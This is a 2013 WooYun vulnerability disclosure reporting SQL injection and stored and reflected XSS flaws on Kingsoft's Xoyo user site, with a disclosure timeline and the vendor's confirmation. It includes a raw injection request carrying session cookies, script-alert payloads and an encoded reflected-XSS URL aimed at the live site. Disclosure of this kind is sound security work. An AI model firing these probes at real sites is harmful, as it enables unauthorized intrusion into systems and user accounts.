当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037219

漏洞标题:金山逍遥存在SQL注射等安全问题

相关厂商:金山逍遥

漏洞作者: 李白

提交时间:2013-09-16 10:52

修复时间:2013-10-31 10:52

公开时间:2013-10-31 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-16: 细节已通知厂商并且等待厂商处理中
2013-09-17: 厂商已经确认,细节仅向厂商公开
2013-09-27: 细节向核心白帽子及相关领域专家公开
2013-10-07: 细节向普通白帽子公开
2013-10-17: 细节向实习白帽子公开
2013-10-31: 细节向公众公开

简要描述:

话说前天发了一个猎豹浏览器的,然后索要地址之后发现,竟然金山旗下所有部门都可以获得地址...其中有一个金山逍遥,不明觉厉

详细说明:

1.SQL注入
发生在后台资料修改页面
为post注入.

POST /Personinfo/infoAction HTTP/1.0
Cookie: reg=Ao4g6W1QNruaQ%2BbyiN%2BTOwhyp5rt64z3odId%2Bt6%2BL95gshqHFSkTkRcX9CqbRx5DbgSItELZHZW6DHaQ%2BUeWWnAU4gJeTH0077%2BZNWjA4mvD%2BU2ey2xJmqiO1g0l65ajE6fNLk89VdD%2Fsghg1h%2FfefI2pMqzig3LxGzopcz%2BDTicVymK5HdUO8FsEWBci8xjhyIGLH06UslAvZ687nMhjt5vRRJSB9AIQ%2FjC0w%2FirxauH7myUejQCaIEC1r4%2FS5TafozV5zsgTSTAgQfQsh%2FPr6L6Sf857Xie%2FwjyJwu0jo%3D; CNZZDATA30066334=cnzz_eid%3D1219158022-1379224539-http%253A%252F%252Fwww.xoyo.com%26ntime%3D1379224539%26cnzz_a%3D0%26retime%3D1379224997128%26sin%3D%26ltime%3D1379224997128%26rtime%3D0; needCode=0; xoyokey=`H7Jco!5m423g&5!-q=31WU&&m42=&249!=.oJB.o08&W9mU=7tok7k7&!26too!W&=o9!6JScB4tkb2cUbt3o.B4!gooJ5&t59BU2; PHPSESSID=9c44e99d0f874e756b6736a1f42bae4e
Content-Length: 261
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: my.xoyo.com
Content-Type: application/x-www-form-urlencoded
Referer: '
obj_Users%5Bgender%5D=1&obj_Users%5Bblood_type%5D=4&obj_Users%5Bqq%5D=6456&obj_Users%5Bmsn%5D=%3Cscript%3Ealert%281%29&obj_Users%5Baddress%5D=753+Main+Street&obj_Users%5Bzip%5D=99801&obj_Users%5Bjob%5D=12&obj_Users%5Bdegree%5D=5&obj_Users%5Bincome%5D=11&x=0&y=0


返回为

30.PNG


2.一次性XSS
在逍遥社区回答问题,在回答处插入XSS代码

wooyun.PNG


此时如果去更改时,xss即触发

wooyuna.PNG


比如管理员看到xss代码,为了社区的安定和谐,于是想去修改他人回答时,一点修改,啪嗒,的确是牺牲了自己,换取了他人
3.反射形XSS
发生在后台实名认证处
http://my.xoyo.com/personinfo/idCard/no/no?%3E%27%22%3E%3Cscript%3Ealert%2891812%29%3C%2Fscript%3E=123

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 李白@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-17 11:37

厂商回复:

收到,确认问题存在,另外之前洞主给的联系方式,打电话没人接,猎豹浏览器的问题还需要再确认下

最新状态:

暂无